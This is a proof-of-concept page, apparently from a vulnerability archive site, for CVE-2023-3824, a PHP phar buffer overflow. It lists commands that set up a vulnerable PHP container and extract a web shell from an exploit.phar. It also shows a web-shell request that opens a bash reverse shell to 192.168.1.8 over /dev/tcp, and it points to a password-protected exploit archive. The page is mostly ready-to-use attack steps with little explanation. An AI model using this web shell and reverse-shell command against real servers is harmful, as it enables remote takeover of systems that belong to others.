Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-3824 PoC — PHP 缓冲区错误漏洞

Source
Associated Vulnerability
Title:PHP 缓冲区错误漏洞 (CVE-2023-3824)
Description:PHP是一种在服务器端执行的脚本语言。 PHP存在安全漏洞,该漏洞源于函数phar_dir_read()存在缓冲区溢出漏洞,该漏洞会导致内存损坏或远程代码执行(RCE)。受影响的产品和版本:PHP 8.0.30之前的8.0版本,8.1.22之前的8.1版本,8.2.8之前的8.2版本。
Readme
sudo docker run -it --rm -p 8080:80 php:8.0.29-apache bash
echo "phar.readonly = Off" >> /usr/local/etc/php/php.ini

http://localhost:8080/shell.php?cmd=bash -c 'bash -i >%26 /dev/tcp/192.168.1.8/5050 0>%261'

php -r "\$phar = new Phar('exploit.phar'); \$phar->extractTo('./', 'shell.php');"

exploit.zip
  pass: infected
File Snapshot

[4.0K] /data/pocs/ac47b8a41b885643451235d9b9b86c3f1c6dfd1c ├── [6.6K] exploit.phar ├── [ 368] exploit.zip ├── [ 782] index.php └── [ 322] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.